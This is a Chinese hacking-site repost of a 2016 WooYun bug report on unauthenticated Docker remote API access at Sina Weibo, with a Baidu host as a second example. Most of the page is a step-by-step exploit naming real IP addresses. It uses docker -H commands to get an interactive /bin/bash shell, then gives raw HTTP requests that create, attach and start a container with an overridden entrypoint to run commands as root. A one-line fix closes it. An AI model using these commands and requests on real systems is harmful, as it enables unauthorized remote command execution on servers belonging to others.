记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新浪微博docker remote API未授权访问导致远程命令执行(root)

2016-05-18 05:50

code 区域
http://123.125.105.158:2375/version

http://123.125.105.159:2375/version



"ApiVersion":"1.17",因为版本太低,我的docker client无法使用。我用burp来发包,实现远程执行系统命令,有一点小技巧。

weibo.apiversion.png

漏洞证明:

安装docker client:

code 区域
https://www.docker.com/products/docker-toolbox



以百度的那个IP为例,要获取交互式shell,首先获取images:

code 区域
docker -H tcp://180.76.161.55:2375 images



code 区域
docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"



这里我设置了entrypoint为/bin/bash。shell到手了,如下图:

baidu_shell.png



好了,继续看微博的机器,因为api的版本太低了,client无法直接使用。

一开始我执行命令的时候发现总不成功,查看container的时候才发现原来默认的Entrypoint是/usr/local/sinasrv2/sbin/nginx。不过创建容器的时候可以overwrite,创建一个容器:

code 区域
POST /v1.17/containers/create HTTP/1.1

Host: 123.125.105.158:2375

User-Agent: Docker-Client/1.7.0 (windows)

Content-Length: 1082

Content-Type: application/json

Accept-Encoding: gzip



{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}



找到Id,如图:

weibo_create_container.png



然后可以获取container的信息检查一下是否有问题,这一步可以略过:

code 区域
http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json



接下来有两个http request,顺序非常重要,一定是要先attach,再start,这样就可以捕获到输出:

code 区域
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1

Host: 123.125.105.158:2375

User-Agent: Docker-Client/1.7.0 (windows)

Content-Length: 0

Content-Type: application/json

Accept-Encoding: gzip



code 区域
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1

Host: 123.125.105.158:2375

User-Agent: Docker-Client/1.7.0 (windows)

Content-Length: 0

Content-Type: application/json

Accept-Encoding: gzip



如图,我在微博的container中执行命令,可以知道当前用户root,hostname是bcd44e3731cc,pwd是app。

weibo.rce.out.png



修复方案:

2375端口不要对外

知识来源: www.wooyun.org/bugs/wooyun-2016-0209856

阅读:105976 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪微博docker remote API未授权访问导致远程命令执行(root)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词